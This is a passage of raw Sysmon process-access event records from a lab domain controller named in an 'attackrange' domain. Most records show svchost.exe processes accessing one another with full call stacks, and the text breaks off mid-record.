12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.383{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.368{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM